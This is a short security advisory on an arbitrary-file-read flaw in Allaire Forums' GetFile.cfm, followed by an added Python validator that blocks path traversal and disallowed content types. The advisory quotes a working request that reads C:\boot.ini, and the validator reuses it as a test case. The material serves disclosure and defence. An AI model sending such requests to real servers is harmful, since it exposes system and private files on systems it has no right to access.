source: https://www.securityfocus.com/bid/229/info
An Allaire Forums file "GetFile.cfm" in the root of the application directory allows anyone to access any file on the Forums server. This vulnerability affects Forums 2.0.4 and earlier.
Type the URL "GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\boot.ini" (without the quotes), where C:\boot.ini is the pathname of the file to read.
The syntax of the request is <CFCONTENT TYPE="#FT#/#FST#" FILE="#FilePath#">
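
One way to constrain the FT, FST and FilePath parameters before they reach a tag like the CFCONTENT one above, written in Python as an added example (not code from the advisory or from Allaire). The attachment root and the list of permitted content types are assumptions chosen for illustration.

```python
import ntpath  # Windows path rules, usable on any platform
from urllib.parse import urlsplit, parse_qs

# Assumptions (not from the advisory): attachment root and permitted types.
ATTACH_ROOT = r"C:\forums\attachments"
ALLOWED_TYPES = {"text/plain", "image/gif", "image/jpeg"}


def resolve_attachment(file_path, root=ATTACH_ROOT):
    """Return the normalized path if it stays under root, else None."""
    if not file_path or "\x00" in file_path:
        return None
    # Reject drive letters, UNC paths and rooted paths outright: the
    # parameter should only ever name a file relative to the root.
    drive, rest = ntpath.splitdrive(file_path)
    if drive or rest.startswith(("\\", "/")):
        return None
    # Collapse ".." segments, then confirm the result is still inside root.
    candidate = ntpath.normpath(ntpath.join(root, file_path))
    prefix = ntpath.normcase(ntpath.normpath(root)) + "\\"
    if ntpath.normcase(candidate).startswith(prefix):
        return candidate
    return None


def check_request(url):
    """Validate a GetFile.cfm-style request; returns (ok, path_or_reason)."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    mime = "{}/{}".format(qs.get("FT", [""])[0], qs.get("FST", [""])[0]).lower()
    if mime not in ALLOWED_TYPES:
        return False, "content type not allowed: " + mime
    path = resolve_attachment(qs.get("FilePath", [""])[0])
    if path is None:
        return False, "FilePath outside attachment root"
    return True, path


if __name__ == "__main__":
    # The first URL is the one quoted in the advisory; the second is constructed.
    for u in (r"GetFile.cfm?FT=Text&FST=Plain&FilePath=C:\boot.ini",
              "GetFile.cfm?FT=Text&FST=Plain&FilePath=notes/readme.txt"):
        print(u, "->", check_request(u))
```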